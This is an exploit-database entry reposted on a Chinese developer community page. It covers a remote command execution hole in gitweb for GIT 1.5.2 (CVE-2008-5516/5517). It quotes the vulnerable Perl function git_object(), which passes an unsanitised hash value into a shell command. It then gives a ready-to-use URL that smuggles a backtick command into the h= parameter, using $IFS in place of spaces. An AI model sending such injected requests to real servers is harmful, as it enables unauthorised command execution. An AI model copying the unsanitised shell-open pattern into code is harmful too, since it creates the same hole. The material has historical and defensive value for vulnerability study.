gitWeb v1.5.2 Remote Command Execution-阿里云开发者社区

gitWeb v1.5.2 Remote Command Execution

2010-02-23 724

版权

本文内容由阿里云实名注册用户自发贡献，版权归原作者所有，阿里云开发者社区不拥有其著作权，亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容，填写侵权投诉表单进行举报，一经查实，本社区将立刻删除涉嫌侵权内容。

简介： # Exploit Title: gitWeb remote command execution # Date: 2009.

 
    # Exploit Title: gitWeb remote command execution  
   
     # Date: 2009.06.19  
    
     # Author: S2 Crew [Hungary]  
    
     # Software Link: -  
    
     # Version: GIT 1.5.2  
    
     # Tested on: debian linux, GIT 1.5.2  
    
     # CVE: CVE-2008-5516 - CVE-2008-5517  
    
     # Code:  
    
     # The cgi script doesn't show the command output *blind command execution ;)*  
    
     # Vulnerable functions in gitweb.cgi: git_snapshot(), git_search(), git_object()  
    
     sub git_object {  
    
              # object is defined by:   
    
              # - hash or hash_base alone   
    
              # - hash_base and file_name   
    
              my $type;   
    
              # - hash or hash_base alone   
    
              if ($hash || ($hash_base && !defined $file_name)) {   
    
                      my $object_id = $hash || $hash_base;   
    
                      my $git_command = git_cmd_str();   
    
                      open my $fd, "-|", "$git_command cat-file -t $object_id 2>/dev/null"   
    
                              or die_error('404 Not Found', "Object does not exist");   
    
                      $type = <$fd>;   
    
                      chomp $type;   
    
                      close $fd   
    
                              or die_error('404 Not Found', "Object does not exist");   
    
              # - hash_base and file_name   
    
     # Example  
    
     http://server/cgi-bin/gitweb.cgi?p=sample.git/.git;a=object;f=program.c;h=e69de29bb2d1d6434b8b29ae775ad8c2e48c5391|`touch$IFS/tmp/file.txt`|;hb=9adaf5b35bb6415497d23f089660567227ea3785

gitWeb v1.5.2 Remote Command Execution

热门文章

最新文章

相关电子书